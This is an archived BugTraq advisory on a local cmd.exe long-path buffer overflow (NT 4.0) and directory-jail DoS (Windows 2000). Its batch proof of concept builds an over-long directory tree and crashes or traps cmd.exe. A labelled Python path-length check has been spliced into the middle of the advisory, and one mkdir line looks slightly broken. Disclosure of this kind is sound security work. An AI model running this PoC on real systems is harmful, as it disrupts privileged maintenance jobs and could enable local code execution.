BugTraq
SECURITY.NNOV: Windows NT 4.0/2000 cmd.exe long path buffer overflow/DoS Feb 11 2003 10:15AM
3APA3A (3APA3A SECURITY NNOV RU)

Title: Buffer overflow/DoS against cmd.exe for Windows NT 4.0/2000
Affected: Microsoft Windows NT 4.0 (buffer overflow), Microsoft Windows 2000 (DoS)
Vendor: Microsoft
Risk: Average for Windows NT 4.0, Low for Windows 2000
Exploitable: Yes
Remote: No
Vendor Notified: January 30, 2003

I. Intro

cmd.exe is the command processor of the Windows NT family of operating
systems. It also processes .bat and .cmd batch files, and many system
administrators run such batch files with elevated privileges for system
maintenance.

II. Vulnerability

cmd.exe has a flaw in its handling of the cd command when the destination
path is long. On Windows NT 4.0 this causes a buffer overflow; on Windows
2000 it causes batch file processing to fail.

III. Details

NTFS allows paths of almost unlimited length, but the Win32 API normally
rejects a path longer than MAX_PATH (260 characters). A path given with the
\\?\ prefix is handed to the file system without this check (and without
the usual normalization of . and .. components), so directories whose full
path exceeds the limit can be created. This is a documented feature of the
Windows API.

cmd.exe from Windows NT 4.0 has a trivial buffer overflow in the CD command
when the destination path is longer than 256 characters. It can be
trivially exploited to execute code. Exploitation is local: the attacker
needs to create the directory tree on a volume where a cmd.exe session,
typically a privileged maintenance batch file, will change into it.

cmd.exe from Windows 2000 has no buffer overflow, but after changing into a
directory whose path is slightly longer than 256 characters (for example
260 characters) cmd.exe becomes "jailed" in that directory: a subsequent
cd .. command fails. A maintenance batch script that descends into such a
directory is therefore stuck, which is a DoS against the script.
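The following is an added example, not code from the original advisory. It is written in Python so that the path logic runs anywhere: it is pure string handling via ntpath and makes no Win32 calls. It shows what the \\?\ prefix commits the caller to (because the prefix disables Win32 path parsing, the path must be absolute, backslash-separated and free of . and .. components before it is handed over, and a UNC path takes the \\?\UNC\ form) and the check a maintenance script would apply before cd: refuse directories whose plain path will not fit the MAX_PATH buffer (260 including the terminating NUL, 259 usable) that cmd.exe and classic Win32 callers are bound to. The default threshold, the constructed directory names and the function names are assumptions of this example; the advisory's observed cmd.exe figure is 256, and the limit is a parameter so that value can be used instead.

```python
"""Extended-length path handling and a MAX_PATH gate for maintenance
scripts. Added example: pure string logic via ntpath, no Win32 calls."""
import ntpath

MAX_PATH = 260                   # Win32 MAX_PATH, which counts the terminating NUL
MAX_PATH_CHARS = MAX_PATH - 1    # longest path usable without the \\?\ prefix
EXT_PREFIX = "\\\\?\\"           # \\?\
EXT_UNC_PREFIX = "\\\\?\\UNC\\"  # \\?\UNC\


def to_extended(path: str) -> str:
    """Return PATH in extended-length form, ready for a Win32 *W API call.

    The prefix turns off Win32 path parsing, so nothing after it is
    normalized by the system: normalize here, and refuse anything that
    is not an absolute drive or UNC path.
    """
    if path.startswith(EXT_PREFIX):
        return path
    norm = ntpath.normpath(path.replace("/", "\\"))
    drive, rest = ntpath.splitdrive(norm)
    if not drive:
        raise ValueError(f"not an absolute path: {path!r}")
    if drive.startswith("\\\\"):
        # \\server\share\dir  ->  \\?\UNC\server\share\dir
        return EXT_UNC_PREFIX + norm[2:]
    if not rest.startswith("\\"):
        raise ValueError(f"drive-relative path not allowed: {path!r}")
    return EXT_PREFIX + norm


def strip_extended(path: str) -> str:
    """Inverse of to_extended: the plain path a MAX_PATH-bound tool would see."""
    if path.startswith(EXT_UNC_PREFIX):
        return "\\\\" + path[len(EXT_UNC_PREFIX):]
    if path.startswith(EXT_PREFIX):
        return path[len(EXT_PREFIX):]
    return path


def exceeds_max_path(path: str, limit: int = MAX_PATH_CHARS) -> bool:
    """True when the plain form of PATH does not fit in LIMIT characters.

    The advisory's cmd.exe buffer overflowed past 256; the documented
    Win32 edge is MAX_PATH_CHARS, which is the default here.
    """
    return len(strip_extended(path)) > limit


def triage(dirs, limit: int = MAX_PATH_CHARS):
    """Split candidate directories into those a batch-style maintenance job
    may cd into and those it must skip and report instead of entering.

    A directory in the second list can only have been created with the
    extended-length prefix, which is the tell-tale of the jail described
    above.
    """
    safe = [d for d in dirs if not exceeds_max_path(d, limit)]
    flagged = [d for d in dirs if exceeds_max_path(d, limit)]
    return safe, flagged


def poc_tree():
    """Constructed sample with the shape of the advisory's PoC tree
    (assumed lengths): one long component A and a shorter one B under C:."""
    a = "A" * 200
    b = "B" * 56
    return [
        "C:\\" + a,               # 203 chars: fits in MAX_PATH
        "C:\\" + a + "\\" + a,    # 404 chars: the NT 4.0 overflow case
        "C:\\" + a + "\\" + b,    # 260 chars: just past the limit, the 2000 jail
    ]


if __name__ == "__main__":
    safe, flagged = triage(poc_tree())
    print("safe to cd into (lengths):", [len(p) for p in safe])
    print("skip, prefix-only (lengths):", [len(p) for p in flagged])
    print(to_extended("C:\\Windows\\Temp\\..\\System32"))
```

The gate is deliberately conservative: a maintenance job that walks a user-writable tree should treat any directory it cannot name within MAX_PATH as hostile input and report it rather than descend, which removes both the overflow and the jail from the job's reach.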

IV. Exploitation

@echo off
REM A is one long directory name, B a shorter one
SET A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
SET B=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
REM The \\?\ prefix skips the Win32 MAX_PATH check, so these mkdirs succeed
mkdir \\?\c:\%A%
mkdir \\?\c:\%A%\%A%
mkdir \\?\c:\%A%\%B%c:
REM Windows NT 4.0: the second cd overflows cmd.exe's path buffer
cd AAAAAAAAAAAA*
cd AAAAAAAAAAAA*
REM Windows 2000: cd into AA...\BB... succeeds, but the following cd .. fails
cd BBBBBBBBBBBB*
cd ..

This creates a directory with two subdirectories. The first demonstrates
the buffer overflow on Windows NT 4.0: the second cd AAAAAAAAA* command
crashes cmd.exe with EIP overwritten. The second demonstrates that cmd.exe
can change into AA...\BB..., after which the cd .. command fails. Because
the tree exceeds MAX_PATH, tools that do not use the \\?\ prefix cannot
remove it afterwards; it has to be deleted with the same prefix, innermost
directory first.

V. Vendor

Microsoft acknowledged the problem.

--
http://www.security.nnov.ru
/\_/ { , . } |+--oQQo->{ ^ }<-----+ | ZARAZA U 3APA3A }
+-------------o66o--+ /
|/
You know my name - look up my number (The Beatles)
